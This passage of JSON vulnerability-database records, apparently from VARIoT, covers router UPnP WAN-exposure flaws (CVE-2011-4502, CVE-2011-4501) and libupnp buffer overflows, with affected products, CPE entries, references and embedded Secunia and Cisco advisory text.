"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4502",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5045",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52447",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"id": "VAR-201111-0158",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
}
],
"trust": 1.3453724428571427
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
}
]
},
"last_update_date": "2023-12-18T12:09:29.362000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.canyon-tech.com/"
},
{
"title": "BR-6104K",
"trust": 0.8,
"url": "http://www.edimax.com/en/produce_detail.php?pd_id=58\u0026pl1_id=3\u0026pl2_id=18"
},
{
"title": "BR-6114Wg",
"trust": 0.8,
"url": "http://www.edimax.co.uk/en/produce_detail.php?pd_id=146\u0026pl1_id=1\u0026pl2_id=48"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "LB000021",
"trust": 0.8,
"url": "http://www.sweex.com/en/assortiment/internet-networking/routers/lb000021/"
},
{
"title": "Patch for Edimax \u0027Edimax EdiLinux\u0027 configuration vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6005"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-16",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 5.0,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.8,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 1.7,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4502"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4502"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "VULHUB",
"id": "VHN-52447"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52447"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:05.043000",
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"date": "2013-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-52447"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"date": "2011-11-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
],
"trust": 0.6
}
}
VAR-201111-0180
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP) compatible routers have vulnerabilities with insufficient access restrictions. On routers that support UPnP, there is a vulnerability that allows unintended UPnP requests from the WAN-side interface to be accepted. An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to internal hosts behind the NAT firewall or to proxy connections through it. Remote unauthenticated attackers can exploit the vulnerabilities to scan internal hosts or to proxy Internet traffic through the device.
The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5; Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1; Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1; Cisco Linksys WRT54GX firmware 2.00.05; Edimax BR-6104K prior to 3.25; Edimax 6114Wg; Canyon-Tech CN-WF512 firmware version 1.83; Canyon-Tech CN-WF514 firmware version 2.08; Sitecom WL-153 prior to firmware 1.39; Sitecom WL-111; Sweex LB000021 firmware version 3.15; ZyXEL P-330W; SpeedTouch 5x6 firmware versions prior to 6.2.29; Thomson TG585 firmware versions prior to 7.4.3.2. Vulnerabilities exist in the UPnP IGD implementation of Edimax EdiLinux on various Edimax devices. This vulnerability is related to the "external forwarding" vulnerability.
----------------------------------------------------------------------
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
This library (libupnp, the Portable SDK for UPnP Devices) is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0180",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lb000021 router",
"scope": "eq",
"trust": 2.4,
"vendor": "sweex",
"version": "3.15"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "3.21"
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.34"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "6114wg",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "lb000021",
"scope": "eq",
"trust": 1.0,
"vendor": "sweex",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.9,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "2.08"
},
{
"model": "br-6104k",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6104k router",
"scope": "lt",
"trust": 0.8,
"vendor": "edimax",
"version": "3.25"
},
{
"model": "br-6114wg",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6114wg router",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153",
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": "wl-153 router",
"scope": "lt",
"trust": 0.8,
"vendor": "sitecom",
"version": "1.39"
},
{
"model": "lb000021",
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:br-6104k_router_firmware:3.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:br-6104k:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf512_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf514_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf514:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf512:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:6114wg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-153:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sweex:lb000021_router_firmware:3.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sweex:lb000021:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4501"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4501",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
